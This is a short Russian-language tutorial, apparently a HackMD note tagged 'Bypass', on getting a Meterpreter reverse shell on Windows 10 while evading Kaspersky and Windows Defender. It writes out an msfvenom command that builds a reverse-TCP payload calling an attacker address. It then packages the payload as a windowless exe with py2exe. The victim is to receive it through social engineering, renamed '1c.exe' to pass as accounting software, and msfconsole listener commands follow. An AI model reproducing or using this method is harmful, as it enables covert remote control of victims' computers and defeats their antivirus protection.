###### tags: `Bypass` # Получение реверс-шелл, обход Антивируса В данной статье рассмотрим получение сессии meterpreter на Windows 10 с установленным антивирусом Касперский 11.4.0.233 *Условимся что Kali-Linux, Windows 10 жертвы находятся в одной подсети 1. На рабочей Windows 10 (не жертвы) устанавливаем питон: ![](https://i.imgur.com/VNvAEWr.png) 2. Устанавливаем Py2exe для питон 2.7: > https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download На кали линукс создаем полезную нагрузку и сохраняем в файл mrtp.py: `msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.213.11 LPORT=443 -f raw -o /var/www/html/mrtp.py` Копируем полученный файл на рабочую Windows 10 с установленным питоном. Скачиваем файл setup.py с помощью него мы будем собирать exe: > https://gist.github.com/msacchetin/1a8edd900608f464c749dd9060f8c8d7 #Правим в файле setup.py 7ю строчку вместо console ставим windows для того чтобы не появлялось окно Сохраняем скачанный файл mrtp.py, setup.py в папку C:\\evasion. Заходим в папку C:\\evasion, запускаем в powershell : python.exe .\setup.py py2exe ![](https://i.imgur.com/IKqww9k.png) ![](https://i.imgur.com/eRC7X2l.png) `Применяя методы к примеру соц.инженерии, передаем на машину жертвы файл mrtp.exe, переименовав в 1c.exe` Запускаем 1с.exe 3. На стороне Кали запускаем сессию meterpreter в консоли : msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set LHOST 192.168.213.11 #указаываем адрес куда подключаться жертве set LPORT 443 run ![](https://i.imgur.com/nO8The2.png) Сессия meterpeter получена, при этом не Windows Defender, не Касперский ничего не заподозрили ![](https://i.imgur.com/CSF5q85.png) ![](https://i.imgur.com/Jd1ZAQr.png)